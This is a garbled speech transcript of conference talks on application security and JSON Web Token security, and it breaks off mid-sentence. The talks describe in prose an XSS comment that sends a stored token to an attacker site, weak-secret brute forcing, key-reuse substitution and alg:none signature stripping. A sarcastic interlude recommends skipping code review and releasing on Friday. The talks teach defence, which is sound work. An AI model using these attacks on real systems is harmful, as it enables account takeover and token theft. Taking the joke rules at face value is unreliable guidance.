 So for how many of you guys is this like your first JS who is this is really more than that more than one year, second year, third year, oh okay good so a lot of freshers so hopefully you can enjoy the whole thing tolerate the two of us as well for two days we won't try to trouble you too much and we like you guys are also developers trying to learn something so yeah I think this time our as I mentioned our theme is also on security but there's like a good mixture of talks that are there which is like right from your front end things to know to GraphQL so it's like a good collection so so first speaker is Shyam one of the fun fact is he's a core contributed to the Angular like in the initial versions of Angular and he made the Angular version which we all liked which was one point something a year later or few years later he released or they released Angular 2 and the next year they released Angular 4 you don't know where 3 went so he's also for the last nine months he's been working on a new framework which gives him trouble every night now I think he'll be able to talk on that so please welcome Shyam Shashadri on stage good morning folks my name is Shyam Shashadri and I'm here to talk about demystifying application security note that it's not demystifying web applications as security it's not demystifying JavaScript security it's application security in general so we'll cover XSS cross-site scripting CSRF cross-site request forgery JSON attacks clickjacking click baiting PTSD RSS one of the reasons why it's very hard to start with security and especially web security is the fact that there are so many security exploits we saw this list it's a very small portion of the OS top 10 there's a bunch of more there were a bunch of other terms there that weren't even anything related to security keeping on top of these things is why it's so hard to deal with security so we won't do that instead let's change the topic and really talk about security in general and how to think about security in a different manner so we won't be talking about a laundry list of XYZ this is how you secure this particular attack this is how you worry about XSRF CSRF but instead let's talk about how security has evolved and really try to understand where the real threats are and the aim of this talk is to really give you a thought framework on how you can think about security in your application will allow you to at least be aware of the threats and then decide on a case by case basis of which ones you want to tackle and how do you want to tackle them so really if anything I would call this talk how to think about security right and we'll focus on what we call attack vectors what are the various ways that you could make your application insecure warning or caveat this will have stuff not necessarily related to JavaScript it's more of a holistic approach to security but that's really what is needed when you start working with security so very quickly about me worked at a quite a few different places start in my career at Google worked at Amazon where I was also a security reviewer reviewing different applications and also headed the engineering and hopscotch written a few books again and again and again on Angular first version second version so on and so forth and currently I run two different startups one focusing on consulting basically rent a CTO for startups and things like that and run my own product startup providing a B2B solution for FMCG companies now in all of this security has been something that I have been a part of or a lead for at various organizations and that's kind of where this thought process comes in from so Amazon I was reviewing applications that were going out for production and this thought framework really helps us ensure we get a good coverage across our application so before we go deeper into that right life in this Stone Age or life before internet security was easy you had to physically lock down things provide access cards and that was about it no internet nothing life was easy then came web 1.0 and this was the era where I kind of grew up where suddenly things were available on the internet people sitting anywhere could access anything thankfully this was still the day and age of your server rendered HTML browsers were dumb useless and annoying but you still have the first set of attack vectors you had things like XSS and CSRF which were still dealing with today and that was it browsers were dumb there weren't that many attack vectors you did the bare minimum security was okay and data wasn't fundamentally online not enough data was so it is still okay by the time we started figuring these out web 2.0 happened browsers became better JavaScript engines became better and like this comic books instead of Pearl or regex I now have JavaScript and that's just increase the number of problems I have I love JavaScript but it is a pain sometimes right what happened basically we started saying everything that we could do on the server everything that we used to do on the server let's put it on the client it's faster he doesn't have to make a server call I can do validation there I can start doing business logic I can start doing access control right and that's the path towards you start doing everything that was the domain of the server on the client fair enough maybe it's still faster a better experience for the user but when we start doing these things solely on the client that's where the problem really starts of course it wasn't enough that we just had this JavaScript explosion of things that you could do on the client you also had this explosion of frameworks I remember JS for a few years back where everyone I talked to was either an angular developer a react developer a backbone developer and there were really very few people who were JavaScript developers or front-end developers back-end developers are not around anymore but knows what happened to them right and you had people who spent time using getting used to frameworks and over time suddenly this responsibility of security who was responsible for security kind of disappeared front-end developers were focused on getting their features their UI things shipped back-end developers were focused on giving the API's and no one really was talking or thinking about security of course unless and until something blew up unless and I think something was so critical that it was boiled in from day one but otherwise security is the last consideration we have if it is a consideration at all so let's take a step back right let's take a very standard client server architecture as basic as it can be you have clients web Android iOS making server calls multiple servers running you have a database very very simplistic where are all the threats where do you consider yourself to be at threat in a setup like this if you talk to a security developer you say every single line every single box everything is a threat which is true anything could potentially could be under attack but I would put to you that the real threat is when we start copy pasting code really stop understanding what's happening really start focusing on getting features out rather than understanding how it works rather than understanding the true setup underneath right and that's where we start going so going back to possible security exploit right it's very easy to say okay let's look at the ovafs top 10 let's look at this list of security holes that were exploited in the last one year but I would put to you that this is a non scalable model it's very hard to keep on top of every single security exploit especially considering the fact that there's a new security exploit every other day so how do you deal with this how do you build an application that is secure while still allowing yourself to be set up for success while you do the bare minimum threat assessment and it all starts with trust if there is one thing you can take away from this talk is that you need to keep thinking about trust all the time when you're building your application when you're updating your application when you're adding a new feature if you can think about trust you'll go a long way to securing your application but trust is a tricky thing so let's do a quick exercise how many here show of hands would trust a guy that looks like this no one really trust shady character okay good for you guys but what about Batman how many here would trust Batman all right quite a few comic book folks Batman is trustworthy you can always trust Batman but what if Batman was really Superman and it's happened in the comics right even the most trustworthy character even the most trustworthy user in your system may not be trustworthy if there's one thing you can do as a security developer or as a JS developer who thinks about security be like Madhai Modi constant vigilance don't trust anyone don't trust anything because if you don't trust anything it's hard to go wrong it's very hard to be betrayed lose data have a security exploit but how does that work in real life right it's easy to go about being paranoid I'm pretty sure I could get a fake I and attach it and walk around like Madhai Moody but does that really work so instead I say don't look at security exploits look at attack vectors trust of course being the most critical one and this goes across all the attackers you'll see that in some way or the other most of the attack vectors come back to trust but then with that context with that hat of trust or a tin foil if you will think about transmission when data is being transmitted is it secure when and where data is being stored is that secure are you hashing signing cryptographically hashing data correctly and we'll talk about each one of these as we go along what about the credentials and notice here we're not in the domain of JavaScript as such some of it is part of JavaScript some of it is outside but to be a complete developer you need to think about all these things libraries it's in this day and age there's a library getting created every six seconds probably not a true fact but close enough and audit log so we'll talk about each one of these but again the fundamental rule of security don't trust especially your user especially the guy you're building your application for don't trust him because that's where most security exploits start and when he gives you data trust that even less question every single data element where is it coming from who's the originator is it somebody from my company some external user how is that transmitted has it been transmitted securely where all has it been stored and how has it been stored when in doubt don't trust it and at the end of the day while you can do all these things on the client and we'll talk about some of these on the server it is as critical that the server trusts the client even less than you do so role based authorization user based authorization access control is a must again not trusting anything that the client says the flip side of that is convenience and who here hasn't actually shipped something for the sake of getting a timeline agile programming we all know it somewhere agile programming has become let's ship things every quickly every week every day God knows what happens to security it rarely happens that that bug that you said that nobody will ever use that code that that no one will ever touch that fix that you added for just one week till you ship the next thing it rarely disappears and it'll rarely be the case that it'll save mankind so don't rely on that so let's talk about trust right and there are a lot of talks today and tomorrow which cover different aspects of this talk specifically going into security authentication identity my role here is to be an MBA talk about everything without actually going into details of anything so let's talk about trust the source of the data right where is it coming from has it been mutated or is it pristine as somebody changed it where all has it been stored and most importantly even if you don't know any of that right what is the impact of trusting what could happen because of trusting that if you think about these things you'll end up with what we call trust boundaries supremely trustworthy data I've never seen anything that is supremely trustworthy somewhat trustworthy data and completely untrustworthy user input completely untrustworthy so you'll do everything in your application to secure it make sure that it can't go out of its zone to access data identity in the web apps relying on the client on the user to tell you who is is like accepting this ID card who here would accept this ID card just out of curiosity login is fundamentally the only time we ever ask the user who is if you're relying on the user or the client or the browser tell you who they are by themselves you're doing it from post login you're relying on the server's own hash something that the server only knows who reliably identify the and even after that right it's very easy to forget when the user says perform this action check out add this item to car place an order or view the order details you need to make sure that one the user is who he says he is to the user has access to that resource that he wants to act on and three he can actually do the action on that resource that he's wanting and if any one of these three are missing I'd save you again don't believe the client when he says I want to check out this order that's where most security holds start so don't trust again going back to that same philosophy do not trust the user then we come to transmission secure transmission in web apps I've seen quite a few web apps while I'm auditing while I'm browsing which do this crazy thing of saying I'm going to make my application so secure that I'm going to encrypt the JSON payload do some cryptographic hashing send it to the server the server will then decrypt it and it's so secure really what you're doing is just reinventing HTTPS and probably in a really really bad way just use HTTPS don't reinvent or use secure web sockets if you're using web sockets but use accepted standards rather than trying to reinvent the wheel for the sake of security secure not just the transmission but also the cookies also who can access that right so when you're talking about data being transmitted make sure that only the client or the server are the two parts that can access that information and no one every non-secure transmission is a leak waiting to happen you don't know where all your hops are from your router to your ISP to finally your server any one of them being compromised is your data being compromised so don't do it if you're not on HTTPS Rome would anyway cry so that's a mood point but use HTTPS then it comes to storage and storage you need to think about of course how what data is stored where is it stored is it stored on my database is it stored on my client and what parts of data are stored your standard thing you store in the database make a call fetch it send it down to the client well what about on the client you cash it you store it in local storage if so what data do you store what is the impact of someone else accessing that computer you need to be able to think about all these things when you start thinking about storing the data and it's not just your database it's stored forever it's stored for a particular time and here also just like trust boundaries you have different criticality levels of data highly critical data payment information user information versus maybe some cash on product listing and the like which might not be as critical and the way you deal with each kind of data is very different so you need to be able to think about these things you assume that this data is going to leak if it's stored there and then think about what would happen and if you're okay with that it's probably not critical data and if you're not okay with that you need to rethink how secure you're making that data of course in the end who has access to that whether it's your database whether it's in your cash whether it's on the local machine or the phone who has access to how can they access it can somebody else some other browser some other client some other user some other website access the same data and what would be the implications of so data is not as simple as get the data render it cash it and move on think about what you're caching where you're caching how long you're caching for cryptography is the last thing as front end developers we usually think about but if you're using it if you're using it don't reinvent the wheel just like HTTPS use accepted tested validated libraries use open SSL metal things like that rather saying I have figured out how to cryptographically hash right now I'm going to build my own RSA algorithm for doing public signing don't do it use secure tested libraries credentials and access if your AWS credentials database credentials if you have access to them or if your code needs access to them think about where they're stored are they checked in are they in your code are they coming from configuration and who has access to the philosophy of credentials is that they're never checked in never available searchable it's need to know basis and nobody needs to know ever except for that one guy maybe so credentials rotate them keep them secure don't check them into your code please don't check it into get libraries who here keeps their libraries that they're using up to date keeps updating their versions how often how does it monthly who does it every six weeks anybody do it once a year at least two out of seven hundred not too bad maybe it's hard it's annoying and especially so if you keep waiting till you have to do node if you're using node has come out with this nice way to check which libraries need to be updated because of security and PM audit but make it hygiene update your libraries especially if they're a minor version of great keep doing it don't wait for too long and keep an eye out for security disclosures which no one ever will so just keep updating assume that the libraries that you're using are updated with the latest and smallest smaller regular updates are always finally audit logs assuming you've done all of this which you won't assuming you've made your application super secure which you won't be able to you will need to be able to always later deep dive and see what happened post factor and that's where audit logs come and you need to be able to know exactly what happened in your application who did and by the time you need it if you don't have it it's too late so think about logging audit logging from day one and make sure it's comprehensive make sure that every action is taken care of whether it's client side calls whether it's server side actions whether it's database mutations so on and so forth make sure all of this you know what is happening with your system who is doing and make sure it's trustworthy the worst kind of audit logs is someone who can go in and change it as a hacker gets access to your system they shouldn't be able to mutate your logs so think about immutable audit logs whenever you can so taking a step back right we covered a whole bunch of different pack vectors not all of them are applicable to each and every application but fundamentally think about these days if only thing you keep asking after this talk is do I trust x do I trust why that's good enough right do I trust the data from the server from the client and remember you can't trust data just because it's coming from your database how did it get into the database who was the originator of that information if I'm Amazon Amazon marketplace data that were created by Amazon employees would be more trustworthy than third-party seller listings so the source of that data becomes important as well do I need the entire data the worst thing you can do is just say here's my database here's my entire data send it down to the client think about you really need to send all parts of this information down to the client can that data be cached and that data be used should it be persisted and then is it secure in all aspects while transmission storing it and are you using the latest and latest libraries if you can do all of that you'll be one step further in the fight against security thank you any questions at this point so I'm interested in knowing what are the laws by government agencies like to nail down the people who might have attempted to break such securities you just repeat that one more time I'm interested in doing the laws you audit logs yeah the security laws against the people like the attackers or hello so security laws itself right so think of it there are no great out-of-the-box solutions for audit logs itself like at restock for our own product we created our own system which tracks all mutations at the database level we have a separate system to log all server calls to see who did what at what point and then we have a system running on top of that which is basically looking for deviations from the norm so we have a norm line saying these are the kinds of actions expected and any deviations from that it's flag so we started with very basic logging manually checking and then we built a automated system on top of that to flag out deviations very very custom inbuilt I haven't found a great out-of-the-box solution for it anything else most of the JavaScript code resides in the browser right so could you share some details about the browser the way it helps or something best practices we can use inside the browser to make it secure so the browser already does a lot to make your application secure so cross domain requests are blocked by default unless you enable course so you're kind of guaranteed that request to your domain are generally coming from your own domain other than that you still have the whole plot of XSS CSR of attacks that you will need to protect that you will need to some frameworks if you use them automatically do that for you but what it really comes down to is knowing thinking about so XSS itself right you trust the data if you do trust the data XSS is not an issue if you don't you need to make sure you're using a framework to protect against cross site request for three again different domains should not be able to make the call should not be able to embed things like that so browser does a lot it's doing a lot but it's upon us to make sure we know what other things can do right it will not protect you with identity or access control that's completely up to the developer take care of in their own application so you need to be able to define that boundary of what is being taken care of by the browser and what in my application I need to take care of over and above low can you suggest open source tool just to a one stop solution kind of thing to test everything out I mean I know this is kind of quite like not I've not found a great free tool for that but let's discuss after this I'm just trying to understand like as a developer like maybe things are identified at a later stages by the QR something especially on the security perspective so I'm just trying to understand if there is any tool which can cover maybe which is also updated on the security bugs that there are there are a few open source tools I can't remember the name for them but starting at the OS top 10 itself starting from there will give you a list of each one of them comes with a tool for testing it there are a few paid libraries and frameworks which give you complete testability and all that but usually paid I think we were primarily focusing on the web application so when we come to mobile applications say it is a different ballgame right so many things reside inside the mobile itself so what are the main things that you would look for in case of security in mobile applications it doesn't fundamentally change right so you still have just like this is an application security so you're still looking at what data can I store on the client whether the client is a browser or a mobile app doesn't change my so if I don't want to necessarily store my user's credit card information on my mobile even if it is encrypted because I might be encrypting it down on the client itself access control the problem still don't change so a lot of these attack vectors still remain whether it's the browser or the Android or an iOS device yes each device has its own special technicalities of what can be accessed or not but going by the rule of thumb don't trust keep it minimal you won't go wrong so you said don't read when the wheel when it comes to cryptography when you come to using so what are what is your thoughts about using that in conjunction with some of your own custom logic so the question is what are you trying to do with the custom logic right what additional benefit does it offer over the existing cryptographic libraries and the security that you get off transmitting it over HTTPS or WSS or something like that I'm specifically talking about the cryptography let's say you're using hash or something right not hash in general let's say using RSA or something but you know that RSA could have its own set of exploits that can be done on it so I think if you use some custom logic with that you might eliminate that possibility so the question is would you ask one developer or ten developers be able to do more than a framework that is being contributed by so many developers over so much time if it gives you peace of mind go for it when you say trust is the main point so trust is the main thing where we have to check and check the boundaries from the customer angle what is the specific domain related or product related thing we should include in terms of security and if we are including it at what point is it during the stage of requirement or how are you checking so did you just repeat the first part I got most of the last part yeah first point is you said trust is the main point right so we have a lot of technical things where we can take it off but the main thing is from a customer angle it may be specific domain related functional related there can be some security that can be implemented so that kind of instances are something you have seen like that so again trust right when I say don't trust the client it's not that don't trust and don't take his input or don't deal with him at all it's take his input but do whatever you can in your application to validate and secure the data right so when you take input from the user and have to display product listings in html make sure you're secured against excesses it's also how that data will be stored how will it be used when it comes to trust so it's scary that if you take data and directly display it later in some other part without securing it that's untrustworthy but for the most part taking the data from the user if you're not rendering it as html and things like that must be fine so trust boundaries really comes down to saying I can take data but it has to be treated in a certain way when someone uses it and anyone who is a user of that data later should be aware of where that data came from and how it can be used so that's really where the trust boundaries come and let's have questions after some time we have words of intercession thanks guys so for those of you couldn't ask we have a joint Q&A of the first three speakers also at the end of the third speaker stock so you can reserve your questions then wow the crowd is awesome 700 plus people and the people who are standing there are so many seats here so please take sounded like a college professor so I realize one thing this is since both of us weren't called or rather our proposals for jsp wasn't accepted this is a very nice time to give a talk because it's the second talk everyone's available and there are 700 people so we've also made one presentation both of us combined and you're going to have people telling you about the cool things that they do in their companies we're going to our presentation is going to be the exact opposite so hopefully I like it what do you think the best ways to increase the production in office any answers okay so our talk is very simple it's very short hopefully I like it okay and it's a stepwise approach like four simple rules if you follow this is definitely going to happen okay so hopefully I like this and we'll get started with our first rule of how to break production so I think we should release fast right we always get new updates we always crave for updates I think so one of the best rule to increase production is release fast have more technical depth to our source code and do stuff like every feature that you're working on should have been released yesterday right I mean that's how office works that's how everything works next thing is don't review code because bad code is a state of mind I don't write bad code someone else thinks I write bad code probably if you have access to your master branch this will really be sorted because yeah my rules then testing you test it if it works for you it should work for everyone simple rule if you're not sure how to achieve this probably this thing you can do is if it's working on local it has to work on production like no questions so and then probably the most important like even if you do all of this the most important of this is this is my favorite one right release on Friday evening right I how many of you do this honestly wow nice good and then so you'll get that one call that you've always wanted or you've planned for the last many days that will be your page duty or someone saying that something's broken so four steps everyone like tried out don't blame me if it doesn't work but yeah so that was our this that's why our talk was rejected so based on these standards you know why we didn't get calls so we have a couple of announcements there's a design workshop that is starting at 10 p.m. in the meta refresh auditorium three track in auditorium three so let's get some I think some real quality of the speakers so our next speaker he does a lot of knowledge sharing on YouTube and I think if you're a junior or a developer who's just starting you know you learn a lot in different fields along JavaScript around react from him I know him mostly because of bundle size that's one of the libraries he's made and another fun fact many of you don't know that he's actually a physicist so that the stage is yours alright it's okay cool alright this is super loud give me a second okay much better so thanks for the intro yeah it's true I am a physicist I don't admit it too often because then people don't take me seriously right cause if you didn't even study computer science are you a real developer so yeah any who I'm going to talk about what makes javascript web token secure and so I think the previous peak already said this but when you're building front end applications there's so many things you have to think about this routing performance animations keeping up with react cons so there's a bunch of things you have to do right and often security takes a backseat which is obviously not cool but it always happens and there's like multiple methods of securing your applications right you can use cookies tokens you can handle them differently you can have no sessions you can only do a server side you can use Java web app that's and shit but the idea that security is difficult right it's a tough thing and it's not super accessible to learn so I'll talk about one of the popular methods of authentication which is Java JSON web tokens I tend to prefer JSON web tokens because they're not super difficult in implementation it's like it's for non-computer science geeks like me who can understand it but it's still secure at the same time so who am I? I'm Siddharth I work for this company called odd zero odd zero is this authentication security company right it's like if you don't have security engineers outsource it or more like use tools that already do that for you tiny pitch I'm on Twitter I post garbage stuff all the time I also run this side company thing I called front end army where I do training mostly front end stuff mostly react these days cool back to JSON web tokens so Jason web tokens are I'm just going to call them JWT are actually an open standard. So it was built by a few folks from Microsoft and people around them and the paper is actually open so you can read the research paper. It's surprisingly short so you can read it. It's all open there. And the kind of built it for a different reason but it's been repurposed on the web for authentication or I should say authorization. So the first use case that they actually built it for was information exchange. So it's just JWTs are a great way of transmitting information between parties right they can be signed you can use public private key pairs. So the idea there is you're always sure of who sent you this message if there's a hacker in between you'll probably get to know and then it's been repurposed for the web for authorization which is for a logged in user you want to figure out is this actually the user or is this somebody else in between it's a hacker or it's like tamper data. So should I give access to this route to the service this API. This is this is a snapshot of the problem it tries to solve to have your user you have your API server this is the original connection but sometimes somebody steals the token or somebody is impersonating your user right and that's the hacker sometimes it's just a man in the middle attack they're tampering with your network and your API server needs to be sure that is this my user is this someone else right that's that's the problem that JWT aims to solve. It does that by doing something called stateless sessions so the idea is that these sessions on need not be stored in your database like cookies it can just live on the client side and get passed around and this this kind of leads to some interesting vulnerabilities and also some interesting features I'm going to talk about all of them but to understand how they're actually secure because if it's on the client side it's kind of just visible right it's like if it's there somebody can just do a Chrome extension and just steal it right so how does it secure so to understand that we need to understand the structure of a JWT it's three parts it's the header the payload and the signature the header and payload are kind of dumps they look like this this is what a token looks like it's all gibberish hash stuff and I've color coded so that looks pretty on black but mostly to signify what is the header and what is the payload cool so you can also have JWT is without a signature it's supported by the spec it's not useful for security purposes but it's supported it exists and we'll talk about it it's important later cool so the header is the metadata about this token you have there's only one mandatory field which is the algorithm say say algorithm and these are some of the nicer algorithms you can use HS 256 or RS 256 and you can also use none which is the no security part of it. There are multiple other fields you can say what is the type like type is always JWT for us you can say what is the content type so the payload is it a is it a JSON object is it again a JWT like you have nested things but for the most part of it this this is enough cool and then so to make that hash thing your first JSON stringified and then your base 64 URL encoded right this makes it secure for the web so all of the exclamation all the possibilities and you hash them down so that you can pass them around and this is what it looks like right again it's only encoded it's not encrypted which means if somebody has this they can just base 64 decode and they'll get back the JSON object right so they can see your metadata it's out there next is the payload so payload is the message you're trying to say so again it has can have any fields you want these are the canonical fields so you have the sub which is usually the subject and then you have the issuer issuer is with service issued this token it could be your own authentication server it could be the same API it could be a third party like out zero of what is the intended audience for this token so for example this token is only useful for the cart API any other API that you use it for should reject it you have the expiry you have the issued at both of these are daytime and then you can have any number of custom fields like I have named John Doe and is your admin or not so that's I'm going to strip everything else this is the useful part for my talk and then you do the same thing you stringify encode you get this ugly hash again it's decoded not encrypted if somebody has this they can decode it and get the thing so the decode thing is you can only use session information here don't try to put secret information like a password or a credit card info right because somebody can't decode this again if third parties can read this by advice this even a good authorization mechanism and that's big that's where you have the signature that's the most interesting part so to create a signature you need the header you need the payload you need a shared secret for HS 256 and you need the algorithm that you're using so it's a function of all of these the secret is the most important part so it's it's not your password that you use for your Gmail account of stuff it has to be more it has to have more entropy so the recommended thing is use a 256 bit secret like this and you obviously don't hard code it so I'm going to read it from the process here. I'm going to store it as an environment variable so that accidentally it doesn't get committed to GitHub. It sounds silly to say this but it has happened in the past with people and companies have gone down because of it. So useful to mention and to create a signature you can use the crypto library. It's a built-in crypto here stands for cryptography not cryptocurrency. So just a side that I have to mention it. So you can use crypto library. You can create a HMAC with a HMAC stands for hashing for message authentication and then you can use a short of six to create the digest so you pass the content. The content is a concatenated string of your header and payload the hash that you have and then you digested for base 64 again you have to base 64 escape it so that you can pass it around the web and you get this hash thing right now this is not encoding right this is encryption using the crypto thing to create an HMAC encryption which means this is only one way. If you have the signature you can't really decoded to understand what's inside it unless you have the shared secret right this is where all the magic happens. So you can always have the answer to have the contents of this message been manipulated right? Did somebody change one of these data admin was false did somebody change it to prove and we look at how but first the token is just you just concatenate these three things the header payload signature. This is what it looks like. It's separated by these dots in between. Cool to do all of this you can of course use a library and they're like millions of libraries. So as Sham said find a trustable one. So this one is called JSON web tokens. It has over a million downloads a week. So I hope it's secure like I know it's a good bunch of my coworkers work on this. So it's secure use this and do you use this? You say JWT or shit that's the timer. Don't touch I thought I'm out of time. Okay, so use JSON web tokens you import it and then you say I'm going to use the payload. I'm going to sign it with JWT past the payload past the secret past the algorithm and then it gives you this whole hash thing right just like a nicer API just say sign payload secret which is the algorithm to use and you get this there's a whole playground that is crafted by a zero. It's called it's on JWT dot IO. It looks something like this. You can put in your token. If you put the secret as well, it's going to decode it for you or you can put the secret and encode it right. It's a good way to test your implementation while in depth. Well, how do you use JWT? So whenever the user wants to access a protected resource on API, the browser should send this JWT send this token using the authorization header right? So it doesn't rely on cookies. It relies on headers right? That's kind of important. So the first request goes to your authorization server. This again could be your own server or it could be a third party like odd zero send in the credentials. You get a token right? This is the document that we'll use for the API. You send it to the API. Now you're not really sending the credentials. You're only sending this token. The API can verify if this token is valid and send you back the data. So how does this API server verify the token? That's the important part. So you have this whole big token. Splitted littered by like the dots. You get the header and payload which are just encoded. So you can you are a decoded. So basically for you are a decoded JSON parsed. You get the data inside them, right? So you see this was the algorithm use. This was the payload right? And now you can see the payload, but you have to verify has this payload been tampered. Is this really coming from the original user? And to do that, you can just create the signature again, right? So we have the secret. We know the algorithm the hacker doesn't or the client doesn't really know the secret on the authentication server and the API server know the secret nobody in between. So it's like the token is passed and the API server at the end can verify by creating the signature again by using JWT again and it gives you the signature. If the signature part of the token matches, you know, it's legit. If not, then you mean something something shady has happened in between. Again, you can use the same library. You said verify. You give the client token. You give the secret and you give the op you give the white list of algorithms that this API supports, right? So the API can actually support multiple authenticate sorry multiple algorithms for different clients. So you give a white list. It's optional in the spec, but you should always give it. I'll show you why soon and then you get a function callback or a promise method. This both you can see if it errors out, then it's been tampered. If it doesn't error out, you just get the data and go on. Cool. So again, you can read the contents of the token, but you if you don't know the secret, you can't change it, right? So you can't really tamper it. Here's a quick example. This is the payload admin is false. This is the token. If I change admin to true the payload changes. But if I don't know the secret, I can't change the signature, which means on the server when you do verify signature will not match. You know, something shared has happened. You reject it, right? Okay, let's talk about the authentication methods. The first one supported by the spec is none, right? It means no signature. So you just say JWT sign, you give the payload, you give null as the secret and you say, don't use any algorithm. You sign it. Don't use that, please. Use something like HS 256, which uses a shared secret, right? It's way more secure than none. Of course. So you give the payload, you give the secret, you give the algorithm to verify again, you get the client token, you pass your shared secret and you say this is the algorithm whitelist, right? Then there is RS 256, which is slightly more secure because it relies on a public and private key pair. The interesting part here is to sign it. You need a private key, which means the authentication server, the first one needs to have the private key sign it, create the token, pass it through the client, pass it to the API server. The API server doesn't need to have the same private key. It only needs to have the public key, right? Which means it's one less thing to protect only the, what do you say? Only the authentication server needs to protect the private key. You don't have it on multiple servers. So it's slightly more secure. The interesting part here is that by the virtue of its name, public key is public, right? So it means anyone can actually grab it from somewhere. You probably put it on GitHub and stuff, but the fun part is the hacker can verify if your token is valid. Still can't change it, right? So that's that makes it pretty secure. The hacker can see the public key, but can't do anything with it unless you have the private key. So it's all cool. Um, the last one is ES 256, which is a slightly more interesting take on RS 256. It also uses a public private key, but these keys are typically smaller, right? So it's, uh, it's perfect because the signature created with them is also smaller. So the network payload that you have to send because you're sending this token on the header is also smaller. So it's slightly more performant over the network. So if you're dealing with low, uh, what do you say bad networks, this is really useful. Uh, the trade off over there is it's slightly slower in comparison actually not slightly. It's like at least five times slower. Usually in benchmarks. So if you have a bunch, if you have a lot of CPU, but your users, you should be internet, then you can use ES 256 over ours. Cool cookies, right? Uh, cookies are the more popular authentication method. So I just want to do a quick comparison here. Um, with cookies, you typically need a database, right? You have to store the cookie somewhere, right? The JWT, we don't actually store it. We just pass it through tokens. We pass it through the header, right? Which makes JWT stateless. If you're storing the cookie in a database, that means for every request you get, you also have to query the database so that extra works. The server has to do, right? Extra requests, extra time performance, et cetera. JWT stateless don't have to do that. Uh, cookies are vulnerable to CSRF, right? So cross-site request for the CSRF is like, when a hacker picks the browser into thinking that the, uh, the information is actually coming from the same website when it's not. And they usually steal your cookies. So, uh, what do you say? JWTs are not vulnerable to CSRF because they don't use cookies, but don't get excited. They are vulnerable to XSS. Which is, which affects both tokens and cookies. Uh, I'll talk about that soon. Sessions can be invalidated on demand with cookie because you store it, you can also delete it or you can flag it as invalid with JWT because you don't store them. You can't really do things like remote logout. So the, the, what do you say? The good practice is to always have an expiration, right? So given expiration and date time, don't create everlasting tokens, create really short-lived tokens that expire on their own. So even if they basically keep expiring, you keep generating new ones. Um, it's useful to say that JWTs can actually be used at cookies, right? They're just hashes. So you can actually store them as cookies. You lose all these benefits, but if remote, instant remote logout is super important to you or for some reason you really rely on cookies, you can use the same hashes as cookies as well. Uh, that totally works. Cool. So important security question. Can JWTs be hacked? Right. Like everything else. Yes. So the JWT spec is bulletproof. It's, it's really good spec, but a weak implementation can get you hacked, right? So JWT really get a bad rep sometimes. Like you see these articles where they criticize JWT for being a shitty algorithm, a shitty authentication method because implementing it is super easy, but implementing it in the right way is requires a lot more careful effort, right? So it's super easy to get started, but then you have to kind of follow some rules to make it bulletproof. It's a lot like CSS, right? You started looks easy. It's just a simple syntax, but on day three, you've completely screwed yourself. Cool. So the first attack I want to talk about is cross-site scripting because I said you are vulnerable to this. So, uh, XSS is, uh, attack where you basically insert. How do I put this? Okay, let me give you an example. So, uh, this is like, uh, the orange website where I'm putting a comment here. And the in the comment, I'm basically saying, I'm saying, yeah, nice post, but what I'm really trying to do is I'm inserting a script tag here and I'm loading an image in the image. I'm actually thinking my own attacker website and I'm passing the local storage token, right? So I'm basically stealing. And if the server doesn't sanitize these comments, right? Sanitize user inputs, they'll just store it. And when the next user comes in or when you open this, the user only sees nice post, but actually that code runs and then I basically stole their token, right? And this is like a super common super old attack. Uh, the orange website takes care of it. So you don't have to worry so much, but, uh, because JWT are also stored on the client. They are vulnerable to XSS. Cool. More JWT specific things is if you use a weak signature for if you use a weak algorithm for your signature, right? So these are the three recommended ones in order of more, more security. So HS 256 shared secret RS 256 is slightly more secure because it uses public and private key. The authentication server has the private key. That's it. The API server doesn't need it. It uses the public third is if you use a weak secret, right? If using HMAC with this shared secret and use a weak secret, um, the funny part about HMAC is that these signatures are optimized for speed, right? So the verification is really fast, but the irony here is if somebody is trying to brute force your password, they can actually use the speed. It's going to take them less time to brute force it, right? So it actually makes attacks slightly easier. Um, so the spec actually says like this is the recommended thing. If you're using a HS 256, uh, when you say algorithm, the key should at least be 256 bit instant, right? So you kind of need like very high entropy. Uh, super secret 007 is a bad password. Elite password is sick. I don't know what I wrote there, but yeah, using like numbers and hash and like things that would work for your Gmail password are just not as secure, uh, when it comes to HMAC. So you kind of have to use a 256 bit, which is roughly 32 ascii characters. Okay. Um, the last, this one is kind of, I introduced at the last moment, which is if you're storing the token in local storage or as cookies, um, I call it the attack, which is, it's just there for someone to take, right? So number one, if you can just don't store these on the client side, don't store them local storage, just keep them in the memory. And when the user refreshes, create a new token, right? It can be really annoying to implement, right? So you, the typical thing that people do is they still store it, but they give it a very short life, right? So that by the time somebody can use it, it's already of gone. Um, the other thing is keep expiring them and implement like a background authentication because otherwise it would be really annoying. If every time I refresh the page, uh, the page tells me, sorry, your extension has expired, click login, go the whole reroute and come back, right? It's going to be super annoying. So implement like a silent background authentication, um, or zero JS kind of does that for you. So you use, you just use open source libraries. Use good open source libraries. Important. Um, the next attack is the next mistake is reusing the same key across services. This, this is a really nice attack. I'm going to mention this. So it's called a substitution attack. Look, something like this. You have your two servers. You have the client in the first service, John Lowe is an admin in the second one. He's not an admin. So you do the typical authentication thing. You send your credentials to get a JWT, right? We're going to call this JWT one and you use the JWT to access data from this, this server, right? The typical method. Now, ideally what you should do is when you're talking to service to, you should send your credentials to service to it will give you a different JWT and you use this JWT to talk to the server, right? Now, if you're an attacker here, what you will definitely try is what happens if I use JWT one for service to, right? Just to try to see if the implementation is right or not. So I'm going to send JWT one. And if you're using the same secret for both the service, it's going to check out, right? It's going to verify and it's going to work. But the problem is JWT one was for admin true, right? Not for admin false. So what the user can do is say, I'm just going to pass admin true and your API servers kind of relies on the authentication service to make this call to pass this data of admin true or false. So if using the same secret, it checks out and you basically screwed. So you have two options that the first one is always mentioned the audience in the payload. I mentioned this at the start. You can mention who is this token intended for so always pass the audience and say this token is only valid for service one, right? And then if service to gets it checks the audience, even if the signature is valid, but the audience is somebody else, it's going to reject it. Option two is just use different secrets. So even for the same payload, it's going to generate slightly different signatures so that so that doesn't match. The recommended approaches just do both, right? Use different secret and always use audience as a good practice. Cool attack number six. If you don't verify the algorithm, you're going to get screwed. So this is called a signature stripping attack. It's really cool where this is the intended signature. This is the intended token strip the signature, right? And I told you JWT supports non-signature things, right? This is algorithm done and then change the header to algorithm none, right? So I've done two things that I've stripped the signature. I've changed the algorithm to none because headers are encoded so I can decode them, change them and switched admin to true. Now on the server when you do a verify, right? And if you're doing a client token and secret, just verify these. It's going to verify them based on the algorithm header, right? Which is none. So it's going to say, okay, this token is obviously not encrypted. It's always true. Let's pass this along. So the bug here is you should always 